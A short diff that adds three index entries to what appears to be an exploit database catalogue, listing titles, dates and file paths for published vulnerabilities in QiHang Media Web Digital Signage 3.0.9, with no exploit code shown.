+48749,exploits/hardware/webapps/48749.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion",2020-08-17,LiquidWorm,webapps,hardware,
+48750,exploits/hardware/webapps/48750.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure",2020-08-17,LiquidWorm,webapps,hardware,
+48751,exploits/hardware/webapps/48751.txt,"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)",2020-08-17,LiquidWorm,webapps,hardware,